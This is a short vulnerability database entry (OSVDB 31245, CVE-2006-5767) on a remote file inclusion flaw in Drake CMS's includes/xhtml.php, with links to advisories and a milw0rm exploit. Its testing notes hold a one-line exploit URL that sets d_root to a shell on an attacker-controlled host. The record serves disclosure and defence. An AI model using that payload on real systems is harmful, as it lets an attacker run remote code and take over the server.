Drake CMS includes/xhtml.php d_root Variable Remote File Inclusion

2006-11-04T04:37:42
ID OSVDB:31245
Type osvdb
Reporter OSVDB
Modified 2006-11-04T04:37:42

Description

Manual Testing Notes

http://[target]/[path]/includes/xhtml.php?d_root=http://[attacker]/shell?

References:

Vendor Specific News/Changelog Entry: http://sourceforge.net/forum/forum.php?forum_id=636860
Mail List Post: http://attrition.org/pipermail/vim/2006-December/001202.html
ISS X-Force ID: 30021
Generic Exploit URL: http://www.milw0rm.com/exploits/2713
FrSIRT Advisory: ADV-2006-4345
CVE-2006-5767
Bugtraq ID: 20914